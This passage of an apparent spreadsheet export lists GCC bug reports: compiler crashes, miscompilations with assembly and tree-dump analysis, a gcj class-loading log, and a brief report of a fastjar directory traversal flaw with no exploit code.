Unfortunately I was not able to reproduce this using a simpler testcase because gcc would omit a punpcklqdq instead of the offending movq/movlps so I attached the whole thing with a description of the problem and an analysis of the wrong assembler code emitted.
When going through the attached file look for the RebuildTable function which is inlined into AddResource.
It contains the following construct:
    for (rptr = resources tptr = tails --j &gt;= 0 rptr++ tptr++)
    {
        *rptr = NullResource
        *tptr = rptr
    }
which initialises two arrays of pointers one filled with null pointers and the other with a pointer to the just filled NULL in the other array.
The symptom (leeding to a segfault just after) shows up that the second tails array is incorrectly initialized. Every second entry does not contain the correct pointer (i.e. filled with the correct value of rptr) but contains a ladder starting at 0 (0x8 018 0x28 ...) i.e. does not add the value of resources as start offset.  (the whole array goes like 0xc000 0x0008 0xc010 0x0018 0xc020 0x0028 ... instead of 0xc000 0xc008 0xc010 0xc018 0xc020 0xc028 ...)
Digging through the code it seems that the tree vectorizer is emitting an optimized implementation of the loop for large amount of entries (j starts at a value of 128 when the failure was observed) after the body of the function.
It fills a bunch of xmm registers with values so that both arrays can be filled 16 bytes at a time (instead of 8 bytes at a time).
Now due to the bug the register that pair-wise fills the tails array should be doing sth like this (pseudo-code)
xmm1 = ((resources + 0x00000008) &lt;&lt; 64) + resources
xmm2 = (0x00000010 &lt;&lt; 64) + 0x00000010
and then fill in xmm1 and add xmm2 to it after each iteration or something like that.
What I now seem to see be seeing is that in my terminology here xmm1 is not filled correctly the upper 64 bit seem to be zero which would explain how the array is incorrectly filled.
The assembler code of this part looks like:
(the start of the for loop in the default code path)
     f0d:       44 89 ee                mov    %r13d%esi
     f10:       83 ee 01                sub    $0x1%esi
     f13:       78 32                   js     f47 
     f15:       41 83 fd 09             cmp    $0x9%r13d
     f19:       0f 87 22 01 00 00       ja     1041 
So here seems to be some logic for the first --j and as to whether the optimized out-of-line code should be jumped (and a non-sse implementation
of the loop body below which looks ok).
Starting at 1041 there is some more funny logic which I don't fully get but some instructions below is where I think the cause of the problem is:
Here the code that initializes xmm1 (also the xmm1 in my pseudo-code above):
    107e:       48 8b 44 24 38          mov    0x38(%rsp)%rax
    1083:       48 83 c0 08             add    $0x8%rax
    1087:       66 48 0f 6e c8          movq   %rax%xmm1
    108c:       0f 12 4c 24 38          movlps 0x38(%rsp)%xmm1
I'm no sse2 expert but it seems as if movlps was supposed to move the lower part of xmm1 (which contains resources + 0x8) to the upper part before overwriting the lower part with resources? Or something like that which it
doesn't (using google and http://www.ews.uiuc.edu/~cjiang/reference/vc191.htm as a reference... :-))
Anyway here is the rest of the method:
    1091:       66 0f 6f c1             movdqa %xmm1%xmm0
    1095:       31 d2                   xor    %edx%edx
    1097:       31 c0                   xor    %eax%eax
    1099:       66 0f 6f 15 00 00 00    movdqa 0x0(%rip)%xmm2        # 10a1 
    10a0:       00 
                        109d: R_X86_64_PC32     .LC3+0xfffffffffffffffc
(presumably loads 0x0000001000000010 into xmm2)
    10a1:       66 0f ef c9             pxor   %xmm1%xmm1
(xmm1 now contains zeroes to fill the resources array)
    10a5:       48 8b 5c 24 38          mov    0x38(%rsp)%rbx
    10aa:       66 0f 7f 0c 03          movdqa %xmm1(%rbx%rax1) &lt;- fill 2 resources entries
    10af:       66 41 0f 7f 04 04       movdqa %xmm0(%r12%rax1) &lt;- fill 2 tails entries
    10b5:       83 c2 01                add    $0x1%edx
    10b8:       48 83 c0 10             add    $0x10%rax
    10bc:       66 0f d4 c2             paddq  %xmm2%xmm0
    10c0:       39 ca                   cmp    %ecx%edx
    10c2:       72 e1                   jb     10a5 
Trying to reproduce the test case gcc omitted a punpcklqdq to initialized the base instead which works so this must me some different code triggered by some other register constraints or something (?).
As from the report I guess this bug was already present in 4.2 haven't tested any other versions myself.</t>
  </si>
  <si>
    <t>christophe</t>
  </si>
  <si>
    <t>GCC-66185</t>
  </si>
  <si>
    <t>[6 Regression] ICE on valid code at -O3 on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk at -O3 on x86_64-linux-gnu in both 32-bit and 64-bit modes. 
It is a regression from 5.1.x. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20150517 (experimental) [trunk revision 223265] (GCC) 
$ 
$ gcc-trunk -O2 small.c ./a.out
$ gcc-5.1 -O3 small.c ./a.out
$ 
$ gcc-trunk -O3 small.c
small.c: In function â€˜mainâ€™:
small.c:5:1: internal compiler error: Segmentation fault
 main ()
  ^
0xacd85f crash_signal
	../../gcc-trunk/gcc/toplev.c:380
0xd066c8 vec::operator[](unsigned int)
	../../gcc-trunk/gcc/vec.h:736
0xd066c8 vec::operator[](unsigned int)
	../../gcc-trunk/gcc/vec.h:1202
0xd066c8 vect_analyze_slp_instance
	../../gcc-trunk/gcc/tree-vect-slp.c:1805
0xd07606 vect_analyze_slp(_loop_vec_info* _bb_vec_info* unsigned int)
	../../gcc-trunk/gcc/tree-vect-slp.c:1897
0xd07ad6 vect_slp_analyze_bb_1
	../../gcc-trunk/gcc/tree-vect-slp.c:2431
0xd07ad6 vect_slp_analyze_bb(basic_block_def*)
	../../gcc-trunk/gcc/tree-vect-slp.c:2561
0xd09e42 execute
	../../gcc-trunk/gcc/tree-vectorizer.c:662
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
------------------------------------
unsigned int a
int b[5] c
int
main ()
{
  for (c = 0 c &lt; 4 c++)
    b[c] = b[c+1] &gt; ((b[0] &gt; 0) &gt; a)
  return 0
}</t>
  </si>
  <si>
    <t>GCC-5377</t>
  </si>
  <si>
    <t>Warning not given when optimizing</t>
  </si>
  <si>
    <t>Here are the results with some versions note that
only the latest shows the problem.
gcc-2.95.3 -Wreturn-type -O2 -finline-functions :
In function `function':
warning: control reaches end of non-void function
gcc-3.0.3 -Wreturn-type -O2 :
In function `function':
warning: control reaches end of non-void function
/* ./a.out returns 123. */
gcc-3.0.3 -Wreturn-type -O2 -finline-functions
/* No warning. */
So the problem is that in the last compilation
the warning is not given and the function()
returns nothing.
Release:
gcc-3.0.3
Environment:
i686-pc-linux-gnu
How-To-Repeat:
static int global_variable
static int
function (void)
{
  /* Just for function() to do something. */
  global_variable = 123
}
int
main (void)
{
  return function ()
}</t>
  </si>
  <si>
    <t>booh</t>
  </si>
  <si>
    <t>GCC-47365</t>
  </si>
  <si>
    <t>[4.5/4.6 Regression] wrong code with -O -ftree-pre</t>
  </si>
  <si>
    <t>Created attachment 23035
reduced testcase
Reported by Vegard Nossum at IRC.
Output:
$ gcc-4.5 -O -ftree-pre testcase.c
$ ./a.out 
Aborted
In the testcase.c.092t.pre dump there is:
...
:
  D.2739_4 = b.a[0].i
  i.0_5 = i
  if (D.2739_4 != i.0_5)
    goto 
  else
    goto 
:
  b.a[0] = b.a[1]
  b.a[1].i = D.2739_4
  pretmp.3_6 = b.a[1].i
  goto 
:
...
:
:
  # prephitmp.4_8 = PHI 
  D.2739_9 = prephitmp.4_8
  D.2739_9 = prephitmp.4_8
  if (D.2739_9 == 0)
    goto 
...
Problematic line is
  pretmp.3_6 = b.a[1].i
which reads the new value of b.a[1].i. It should either happen one line earlier or it should read b.a[0].i.
It seems that the fact b.a[0] = b.a[1] overwrites b.a[0].i is ignored.
Of couse I can be wrong.
Tested revisions:
r169006 - OK
4.5 r168785 - fail
4.4 r168785 - OK</t>
  </si>
  <si>
    <t>GCC-60657</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE: error: insn does not satisfy its constraints</t>
  </si>
  <si>
    <t>Created attachment 32452
preprocessed source
seen with trunk r208764 on arm-linux-gnueabihf works with 4.8 branch.
$ g++ -std=c++11 -c -g -O2 wide_posix_api.ii
In file included from ext/boost/regex/v4/regex.hpp:73:0
                 from ext/boost/regex.hpp:31
                 from ext/boost/libs/regex/src/wide_posix_api.cpp:25:
ext/boost/regex/v4/basic_regex_parser.hpp: In member function 'bool boost::re_detail::basic_regex_parser::parse_extended_escape() [with charT = wchar_t traits = boost::c_regex_traits]':
ext/boost/regex/v4/basic_regex_parser.hpp:910:1: error: insn does not satisfy its constraints:
 }
 ^
(insn 3014 3013 3015 227 (set (reg:SI 788 [ D.215148 ])
        (zero_extract:SI (reg:SI 786 [ this_35(D)-&gt;D.157694.m_backrefs ])
            (const_int 1 [0x1])
            (const_int 9999 [0x270f]))) ext/boost/regex/v4/basic_regex_parser.hpp:876 149 {extzv_t2}
     (expr_list:REG_DEAD (reg:SI 786 [ this_35(D)-&gt;D.157694.m_backrefs ])
        (nil)))
ext/boost/regex/v4/basic_regex_parser.hpp:910:1: internal compiler error: in extract_constrain_insn_cached at recog.c:2156
Please submit a full bug report
with preprocessed source if appropriate.
$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/arm-linux-gnueabihf/4.9/lto-wrapper
Target: arm-linux-gnueabihf
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.9-20140322-1ubuntu1' --with-bugurl=file:///usr/share/doc/gcc-4.9/README.Bugs --enable-languages=cc++javagofortranobjcobj-c++ --prefix=/usr --program-suffix=-4.9 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.9 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --disable-libmudflap --disable-libitm --disable-libquadmath --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.9-armhf/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.9-armhf --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.9-armhf --with-arch-directory=arm --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --enable-multilib --disable-sjlj-exceptions --with-arch=armv7-a --with-fpu=vfpv3-d16 --with-float=hard --with-mode=thumb --disable-werror --enable-multilib --enable-checking=release --build=arm-linux-gnueabihf --host=arm-linux-gnueabihf --target=arm-linux-gnueabihf
Thread model: posix
gcc version 4.9.0 20140322 (experimental) [trunk revision 208764] (Ubuntu 4.9-20140322-1ubuntu1)</t>
  </si>
  <si>
    <t>GCC-2226</t>
  </si>
  <si>
    <t>gcc build ignores CPPFLAGS</t>
  </si>
  <si>
    <t>Gcc is using system headers to compile itself but there is
no (documented) way to specify cpp-flags which are then used
during the entire build process.
Release:
gcc-2.95.2 gcc-20010205
How-To-Repeat:
One example would be on a linux sytem: delete the linux and
asm symlinks in /usr/include and try to compile gcc with
``-idirafter /usr/src/linux/include''.</t>
  </si>
  <si>
    <t>airwin</t>
  </si>
  <si>
    <t>GCC-59571</t>
  </si>
  <si>
    <t>[C++11] ICE when casting inside static member constexpr brace initializer</t>
  </si>
  <si>
    <t>$ cat ice.cpp
template 
struct foo
{
    static constexpr int bar{(int)-1}
}
$ g++ -std=c++11 -c ice.cpp
ice.cpp:4:37: internal compiler error: unexpected expression â€˜(int)((-1))â€™ of kind cast_expr
     static constexpr int bar{(int)-1}
                                     ^
ice.cpp:4:37: internal compiler error: Aborted
g++: internal compiler error: Aborted (program cc1plus)
...
$ g++ --version
g++ (GCC) 4.8.2
...</t>
  </si>
  <si>
    <t>bruck.michael</t>
  </si>
  <si>
    <t>GCC-53245</t>
  </si>
  <si>
    <t>[4.8 Regression] ice in expand_case</t>
  </si>
  <si>
    <t>Created attachment 27314
C source code
I just tried to compile the package ruby-1.9.3.194-10.1
on gcc-4.8 trunk dated 20120503 on an AMD x86_64 box.
The compiler said
parse.y: In function 'ruby_yyparse':
parse.y:6668:5: internal compiler error: in expand_case at stmt.c:2116
     switch (c = nextc()) {
     ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source code attached. Flag -O2 required.</t>
  </si>
  <si>
    <t>GCC-18331</t>
  </si>
  <si>
    <t>[4.0 regression] mmix-knuth-mmixware testsuite failure: execute/ieee/fp-cmp-8.c gcc.dg/20040625-1.c</t>
  </si>
  <si>
    <t>With LAST_UPDATED: Sat Nov  6 19:25:03 GMT 2004 I get:
FAIL: gcc.c-torture/execute/ieee/fp-cmp-8.c compilation  -O1
FAIL: gcc.c-torture/execute/ieee/fp-cmp-8.c compilation  -O2
FAIL: gcc.c-torture/execute/ieee/fp-cmp-8.c compilation  -O3
-fomit-frame-pointer
FAIL: gcc.c-torture/execute/ieee/fp-cmp-8.c compilation  -O3
-fomit-frame-pointer -funroll-loops
FAIL: gcc.c-torture/execute/ieee/fp-cmp-8.c compilation  -O3
-fomit-frame-pointer -funroll-all-loops -finline-functions
FAIL: gcc.c-torture/execute/ieee/fp-cmp-8.c compilation  -O3 -g
FAIL: gcc.c-torture/execute/ieee/fp-cmp-8.c compilation  -Os
FAIL: gcc.c-torture/execute/ieee/fp-cmp-8l.c compilation  -O1
FAIL: gcc.c-torture/execute/ieee/fp-cmp-8l.c compilation  -O2
FAIL: gcc.c-torture/execute/ieee/fp-cmp-8l.c compilation  -O3
-fomit-frame-pointer
FAIL: gcc.c-torture/execute/ieee/fp-cmp-8l.c compilation  -O3 -g
FAIL: gcc.c-torture/execute/ieee/fp-cmp-8l.c compilation  -Os
(the 8 and 8l are the same: long == long double)
With the message in the .log being:
/gcc/testsuite/gcc.c-torture/execute/ieee/fp-cmp-8.c: In function
'test_islessequal':
/gcc/testsuite/gcc.c-torture/execute/ieee/fp-cmp-8.c:35: error: MMIX Internal:
Trying to output invalidly reversed condition:
(gt (reg:CC_FP 0 $0 [278])
    (const_int 0 [0x0]))
/gcc/testsuite/gcc.c-torture/execute/ieee/fp-cmp-8.c:35: internal compiler
error: in mmix_output_condition at config/mmix/mmix.c:2768
Last known to work on: Fri Jul 9 02:34:14 GMT 2004.
Known to fail on: Sat Sep 11 14:54:38 GMT 2004.</t>
  </si>
  <si>
    <t>GCC-37791</t>
  </si>
  <si>
    <t>Regression in 0.98 merge tree</t>
  </si>
  <si>
    <t>A few Mauve tests now throw an OutOfMemory error following the merge up to Classpath 0.98:
TEST: java.lang.Character.Blocks15
  uncaught exception:
   java.lang.OutOfMemoryError
java.lang.OutOfMemoryError
   &gt;
Strangely the bug seems to be unreproducible outside the test harness (copying all lines of code from Blocks15 to a new class and executing it cause the class to run successfully).
Verbose info:
[Loaded (pre-compiled) java.lang.ClassLoader from ]
[Loaded (pre-compiled) java.lang.Object from ]
[Loaded (pre-compiled) java.lang.Class from ]
[Loaded (pre-compiled) java.lang.reflect.Type from ]
[Loaded (pre-compiled) java.lang.reflect.AnnotatedElement from ]
[Loaded (pre-compiled) java.lang.reflect.GenericDeclaration from ]
[Loaded (pre-compiled) java.io.Serializable from ]
[Loaded (pre-compiled) java.lang.Cloneable from ]
[Loaded (pre-compiled) java.lang.VMClassLoader from ]
[Loaded (pre-compiled) java.lang.RuntimePermission from ]
[Loaded (pre-compiled) java.security.BasicPermission from ]
[Loaded (pre-compiled) java.security.Permission from ]
[Loaded (pre-compiled) java.security.Guard from ]
[Loaded (pre-compiled) java.security.Permissions from ]
[Loaded (pre-compiled) java.security.PermissionCollection from ]
[Loaded (pre-compiled) java.util.Hashtable from ]
[Loaded (pre-compiled) java.util.Dictionary from ]
[Loaded (pre-compiled) java.util.Map from ]
[Loaded (pre-compiled) java.security.AllPermission from ]
[Loaded (pre-compiled) java.security.AllPermission$AllPermissionCollection from ]
[Loaded (pre-compiled) java.util.Hashtable$HashEntry from ]
[Loaded (pre-compiled) java.util.AbstractMap$SimpleEntry from ]
[Loaded (pre-compiled) java.util.Map$Entry from ]
[Loaded (pre-compiled) java.security.ProtectionDomain from ]
[Loaded (pre-compiled) java.util.HashMap from ]
[Loaded (pre-compiled) java.util.AbstractMap from ]
[Loaded (pre-compiled) java.lang.System from ]
[Loaded (pre-compiled) java.io.BufferedInputStream from ]
[Loaded (pre-compiled) java.io.FilterInputStream from ]
[Loaded (pre-compiled) java.io.InputStream from ]
[Loaded (pre-compiled) java.io.Closeable from ]
[Loaded (pre-compiled) java.io.FileInputStream from ]
[Loaded (pre-compiled) java.io.FileDescriptor from ]
[Loaded (pre-compiled) gnu.java.nio.channels.FileChannelImpl from ]
[Loaded (pre-compiled) java.nio.channels.FileChannel from ]
[Loaded (pre-compiled) java.nio.channels.spi.AbstractInterruptibleChannel from ]
[Loaded (pre-compiled) java.nio.channels.Channel from ]
[Loaded (pre-compiled) java.nio.channels.InterruptibleChannel from ]
[Loaded (pre-compiled) java.nio.channels.ByteChannel from ]
[Loaded (pre-compiled) java.nio.channels.ReadableByteChannel from ]
[Loaded (pre-compiled) java.nio.channels.WritableByteChannel from ]
[Loaded (pre-compiled) java.nio.channels.GatheringByteChannel from ]
[Loaded (pre-compiled) java.nio.channels.ScatteringByteChannel from ]
[Loaded (pre-compiled) java.lang.SecurityManager from ]
[Loaded (pre-compiled) java.io.PrintStream from ]
[Loaded (pre-compiled) java.io.FilterOutputStream from ]
[Loaded (pre-compiled) java.io.OutputStream from ]
[Loaded (pre-compiled) java.io.Flushable from ]
[Loaded (pre-compiled) java.lang.Appendable from ]
[Loaded (pre-compiled) gnu.classpath.SystemProperties from ]
[Loaded (pre-compiled) java.util.Properties from ]
[Loaded (pre-compiled) java.lang.StringBuilder from ]
[Loaded (pre-compiled) java.lang.AbstractStringBuffer from ]
[Loaded (pre-compiled) java.lang.CharSequence from ]
[Loaded (pre-compiled) java.lang.String from ]
[Loaded (pre-compiled) java.lang.Comparable from ]
[Loaded (pre-compiled) java.lang.String$CaseInsensitiveComparator from ]
[Loaded (pre-compiled) java.util.Comparator from ]
[Loaded (pre-compiled) java.util.Hashtable$3 from ]
[Loaded (pre-compiled) java.util.AbstractSet from ]
[Loaded (pre-compiled) java.util.AbstractCollection from ]
[Loaded (pre-compiled) java.util.Collection from ]
[Loaded (pre-compiled) java.lang.Iterable from ]
[Loaded (pre-compiled) java.util.Set from ]
[Loaded (pre-compiled) java.util.Collections$SynchronizedSet from ]
[Loaded (pre-compiled) java.util.Collections$SynchronizedCollection from ]
[Loaded (pre-compiled) java.util.Collections$SynchronizedIterator from ]
[Loaded (pre-compiled) java.util.Iterator from ]
[Loaded (pre-compiled) java.util.Hashtable$EntryIterator from ]
[Loaded (pre-compiled) java.io.BufferedOutputStream from ]
[Loaded (pre-compiled) java.io.FileOutputStream from ]
[Loaded (pre-compiled) gnu.gcj.convert.UnicodeToBytes from ]
[Loaded (pre-compiled) gnu.gcj.convert.IOConverter from ]
[Loaded (pre-compiled) gnu.gcj.convert.Output_UTF8 from ]
[Loaded (pre-compiled) java.lang.reflect.Modifier from ]
[Loaded (pre-compiled) gnu.gcj.runtime.ExtensionClassLoader from ]
[Loaded (pre-compiled) gnu.gcj.runtime.HelperClassLoader from ]
[Loaded (pre-compiled) java.net.URLClassLoader from ]
[Loaded (pre-compiled) java.security.SecureClassLoader from ]
[Loaded (pre-compiled) gnu.java.net.loader.URLStreamHandlerCache from ]
[Loaded (pre-compiled) java.util.concurrent.ConcurrentHashMap from ]
[Loaded (pre-compiled) java.util.concurrent.ConcurrentMap from ]
[Loaded (pre-compiled) java.util.concurrent.ConcurrentHashMap$Segment from ]
[Loaded (pre-compiled) java.util.concurrent.locks.ReentrantLock from ]
[Loaded (pre-compiled) java.util.concurrent.locks.Lock from ]
[Loaded (pre-compiled) java.util.concurrent.locks.ReentrantLock$NonfairSync from ]
[Loaded (pre-compiled) java.util.concurrent.locks.ReentrantLock$Sync from ]
[Loaded (pre-compiled) java.util.concurrent.locks.AbstractQueuedSynchronizer from ]
[Loaded (pre-compiled) java.util.concurrent.locks.AbstractOwnableSynchronizer from ]
[Loaded (pre-compiled) sun.misc.Unsafe from ]
[Loaded (pre-compiled) java.lang.reflect.Field from ]
[Loaded (pre-compiled) java.lang.reflect.AccessibleObject from ]
[Loaded (pre-compiled) java.lang.reflect.Member from ]
[Loaded (pre-compiled) java.util.concurrent.ConcurrentHashMap$HashEntry from ]
[Loaded (pre-compiled) java.util.Vector from ]
[Loaded (pre-compiled) java.util.AbstractList from ]
[Loaded (pre-compiled) java.util.List from ]
[Loaded (pre-compiled) java.util.RandomAccess from ]
[Loaded (pre-compiled) gnu.gcj.runtime.SystemClassLoader from ]
[Loaded (pre-compiled) java.security.CodeSource from ]
[Loaded (pre-compiled) java.security.Policy from ]
[Loaded (pre-compiled) gnu.java.security.provider.DefaultPolicy from ]
[Loaded (pre-compiled) java.util.StringTokenizer from ]
[Loaded (pre-compiled) java.util.Enumeration from ]
[Loaded (pre-compiled) java.io.File from ]
[Loaded (pre-compiled) java.lang.Math from ]
[Loaded (pre-compiled) java.util.Random from ]
[Loaded (pre-compiled) java.lang.Double from ]
[Loaded (pre-compiled) java.lang.Number from ]
[Loaded (pre-compiled) java.net.URL from ]
[Loaded (pre-compiled) java.net.URL$1 from ]
[Loaded (pre-compiled) java.security.PrivilegedAction from ]
[Loaded (pre-compiled) java.security.AccessController from ]
[Loaded (pre-compiled) java.security.VMAccessController from ]
[Loaded (pre-compiled) java.security.AccessControlContext from ]
[Loaded (pre-compiled) java.util.HashSet from ]
[Loaded (pre-compiled) java.util.HashMap$HashEntry from ]
[Loaded (pre-compiled) java.util.HashMap$HashIterator from ]
[Loaded (pre-compiled) gnu.classpath.Configuration from ]
[Loaded (pre-compiled) gnu.java.net.protocol.file.Handler from ]
[Loaded (pre-compiled) java.net.URLStreamHandler from ]
[Loaded (pre-compiled) java.lang.Package from ]
[Loaded (pre-compiled) java.lang.ref.WeakReference from ]
[Loaded (pre-compiled) java.lang.ref.Reference from ]
[Loaded (pre-compiled) java.lang.ClassNotFoundException from ]
[Loaded (pre-compiled) java.lang.Exception from ]
[Loaded (pre-compiled) java.lang.Throwable from ]
[Loaded (pre-compiled) java.lang.VMThrowable from ]
[Loaded (pre-compiled) gnu.java.net.loader.FileURLLoader from ]
[Loaded (pre-compiled) gnu.java.net.loader.URLLoader from ]
[Loaded (pre-compiled) gnu.gcj.runtime.BootClassLoader from ]
[Loaded (pre-compiled) gnu.java.net.protocol.core.Handler from ]
[Loaded (pre-compiled) gnu.java.net.loader.RemoteURLLoader from ]
[Loaded (pre-compiled) java.lang.OutOfMemoryError from ]
[Loaded (pre-compiled) java.lang.VirtualMachineError from ]
[Loaded (pre-compiled) java.lang.Error from ]
[Loaded (pre-compiled) java.util.IdentityHashMap from ]
[Loaded (pre-compiled) gnu.java.net.protocol.core.Connection from ]
[Loaded (pre-compiled) java.net.URLConnection from ]
[Loaded (pre-compiled) gnu.java.net.DefaultContentHandlerFactory from ]
[Loaded (pre-compiled) java.net.ContentHandlerFactory from ]
[Loaded (pre-compiled) java.util.Arrays from ]
[Loaded (pre-compiled) java.io.IOException from ]
[Loaded (pre-compiled) gnu.java.lang.CPStringBuilder from ]
[Loaded (pre-compiled) java.util.Arrays$ArrayList from ]
[Loaded (pre-compiled) java.util.AbstractList$2 from ]
[Loaded (pre-compiled) java.util.concurrent.locks.ReentrantReadWriteLock from ]
[Loaded (pre-compiled) java.util.concurrent.locks.ReadWriteLock from ]
[Loaded (pre-compiled) java.util.concurrent.locks.ReentrantReadWriteLock$NonfairSync from ]
[Loaded (pre-compiled) java.util.concurrent.locks.ReentrantReadWriteLock$Sync from ]
[Loaded (pre-compiled) java.util.concurrent.locks.ReentrantReadWriteLock$Sync$ThreadLocalHoldCounter from ]
[Loaded (pre-compiled) java.lang.ThreadLocal from ]
[Loaded (pre-compiled) java.util.concurrent.locks.ReentrantReadWriteLock$ReadLock from ]
[Loaded (pre-compiled) java.util.concurrent.locks.ReentrantReadWriteLock$WriteLock from ]
[Loaded (pre-compiled) gnu.gcj.runtime.FinalizerThread from ]
[Loaded (pre-compiled) java.lang.Thread from ]
[Loaded (pre-compiled) java.lang.Runnable from ]
[Loaded (pre-compiled) java.lang.StackTraceElement from ]
[Loaded (pre-compiled) java.lang.ThreadGroup from ]
[Loaded (pre-compiled) java.lang.Thread$UncaughtExceptionHandler from ]
[Loaded (pre-compiled) java.lang.ThreadLocalMap from ]
[Loaded (pre-compiled) java.lang.ThreadLocalMap$Entry from ]
[Loaded (pre-compiled) gnu.gcj.convert.BytesToUnicode from ]
[Loaded (pre-compiled) gnu.gcj.convert.Input_UTF8 from ]
[Loaded (pre-compiled) java.lang.Runtime from ]
[Loaded (pre-compiled) gnu.java.lang.MainThread from ]
[Loaded (pre-compiled) gnu.java.net.loader.FileResource from ]
[Loaded (pre-compiled) gnu.java.net.loader.Resource from ]
[Loaded (pre-compiled) java.io.FilePermission from ]
[Loaded (pre-compiled) java.security.Permissions$PermissionsHash from ]
[Loaded (pre-compiled) java.lang.VMCompiler from ]
[Loaded (pre-compiled) java.util.WeakHashMap from ]
[Loaded (pre-compiled) java.util.WeakHashMap$1 from ]
[Loaded (pre-compiled) java.util.WeakHashMap$WeakEntrySet from ]
[Loaded (pre-compiled) java.lang.ref.ReferenceQueue from ]
[Loaded (pre-compiled) gnu.java.security.hash.MD5 from ]
[Loaded (pre-compiled) gnu.java.security.hash.BaseHash from ]
[Loaded (pre-compiled) gnu.java.security.hash.IMessageDigest from ]
[Loaded (pre-compiled) gnu.gcj.runtime.PersistentByteMap from ]
[Loaded (pre-compiled) gnu.gcj.runtime.PersistentByteMap$AccessMode from ]
[Loaded (pre-compiled) java.nio.channels.FileChannel$MapMode from ]
[Loaded (pre-compiled) java.nio.MappedByteBufferImpl from ]
[Loaded (pre-compiled) java.nio.MappedByteBuffer from ]
[Loaded (pre-compiled) java.nio.ByteBuffer from ]
[Loaded (pre-compiled) java.nio.Buffer from ]
[Loaded (pre-compiled) java.nio.ByteOrder from ]
[Loaded (pre-compiled) java.util.Vector$1 from ]
[Loaded (bytecode) gnu.testlet.config from (file:/tmp/mauve-gcj-4.4/ )]
[Loaded (bytecode) gnu.testlet.TestHarness from (file:/tmp/mauve-gcj-4.4/ )]
[Loaded (bytecode) RunnerProcess from (file:/tmp/mauve-gcj-4.4/ )]
[Loaded (pre-compiled) java.io.Reader from ]
[Loaded (pre-compiled) java.lang.Readable from ]
[Loaded (pre-compiled) java.io.FileReader from ]
[Loaded (pre-compiled) java.io.InputStreamReader from ]
[Loaded (pre-compiled) java.io.BufferedReader from ]
[Loaded (pre-compiled) java.io.FileNotFoundException from ]
[Loaded (pre-compiled) java.lang.RuntimeException from ]
[Loaded (bytecode) gnu.testlet.ResourceNotFoundException from (file:/tmp/mauve-gcj-4.4/ )]
[Loaded (bytecode) gnu.testlet.TestReport from (file:/tmp/mauve-gcj-4.4/ )]
[Loaded (pre-compiled) java.lang.reflect.Method from ]
[Loaded (bytecode) gnu.testlet.TestResult from (file:/tmp/mauve-gcj-4.4/ )]
[Loaded (pre-compiled) java.lang.StringBuffer from ]
[Loaded (pre-compiled) java.util.ArrayList from ]
[Loaded (pre-compiled) java.lang.IllegalArgumentException from ]
[Loaded (bytecode) gnu.testlet.Testlet from (file:/tmp/mauve-gcj-4.4/ )]
[Loaded (pre-compiled) java.io.ByteArrayOutputStream from ]
[Loaded (pre-compiled) java.lang.Integer from ]
[Loaded (pre-compiled) java.io.DataOutputStream from ]
[Loaded (pre-compiled) java.io.DataOutput from ]
[Loaded (bytecode) gnu.testlet.java.lang.Character.Blocks15 from (file:/tmp/mauve-gcj-4.4/ )]
[Loaded (bytecode) gnu.testlet.VisualTestlet from (file:/tmp/mauve-gcj-4.4/ )]
[Loaded (pre-compiled) java.lang.NullPointerException from ]
[Loaded (pre-compiled) java.lang.Character$UnicodeBlock from ]
[Loaded (pre-compiled) java.lang.Character$Subset from ]
[Loaded (pre-compiled) java.lang.Character$UnicodeBlock$NameType from ]
[Loaded (pre-compiled) java.lang.Enum from ]
[Loaded (pre-compiled) java.util.Locale from ]
[Loaded (pre-compiled) java.text.Collator from ]
[Loaded (pre-compiled) java.util.ResourceBundle from ]
[Loaded (pre-compiled) java.util.ResourceBundle$1 from ]
[Loaded (pre-compiled) java.util.LinkedHashMap from ]
[Loaded (pre-compiled) java.util.ResourceBundle$BundleKey from ]
[Loaded (pre-compiled) gnu.gcj.runtime.NameFinder from ]
[Loaded (pre-compiled) java.util.Collections from ]
[Loaded (pre-compiled) java.util.Collections$EmptySet from ]
[Loaded (pre-compiled) java.util.Collections$EmptyList from ]
[Loaded (pre-compiled) java.util.Collections$EmptyMap from ]
[Loaded (pre-compiled) java.util.Collections$ReverseComparator from ]
[Loaded (pre-compiled) java.lang.Boolean from ]
[Loaded (pre-compiled) java.util.HashMap$2 from ]
[Loaded (bytecode) gnu.testlet.TestSecurityManager from (file:/tmp/mauve-gcj-4.4/ )]
[Loaded (pre-compiled) java.lang.Throwable$StaticData from ]</t>
  </si>
  <si>
    <t>GCC-28359</t>
  </si>
  <si>
    <t>fastjar</t>
  </si>
  <si>
    <t>fastjar directory traversal problem</t>
  </si>
  <si>
    <t>fastjar contains the following security problem:
When a JAR archive is extracted with filenames with ../ inside it can
extract files outside of the current directory (a so called directory traversal).
Unconspicious users unpacking such files could overwrite their own files
or even system files when being root.
I am attaching a sample cups.jar from an earlier CUPS tarball which exposes
this problem.</t>
  </si>
  <si>
    <t>GCC-2280</t>
  </si>
  <si>
    <t>gcj -C does not translate Java 'finally' correctly</t>
  </si>
  <si>
    <t xml:space="preserve">	Problem occurred during compilation of java/io/ObjectOutputStream::writeObject
        ... java source of writeObject:
        catch (IOException e)
    {
